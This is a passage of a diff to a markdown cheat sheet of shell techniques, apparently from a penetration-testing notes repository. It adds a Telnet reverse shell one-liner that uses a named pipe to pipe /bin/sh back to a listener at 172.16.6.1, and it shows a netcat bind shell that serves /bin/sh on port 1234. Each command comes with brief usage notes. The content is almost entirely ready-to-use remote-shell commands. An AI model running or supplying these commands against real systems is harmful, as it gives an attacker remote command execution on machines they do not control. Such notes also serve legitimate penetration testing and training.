ice-wzl/Hacknetics/shells.md

 `set LPORT 1234`
 `run`

+#### Reverse shell over the Telnet Protocol
+`mknod a p; telnet 172.16.6.1 1234 0<a | /bin/sh 1>a`
+- This reverse shell makes a special character file (mknod) uses telnet to call back and direct standard output to the character file via the binary /bin/sh

 ### Bind Shells
 #### Netcat Bind Shell
 `nc -nlvp 1234 -e /bin/sh`
 - This is executed on the target box and waits for an incoming connection `nc [target box ip] 1234`
 - This is executed on your attack box to connect to the listener on the target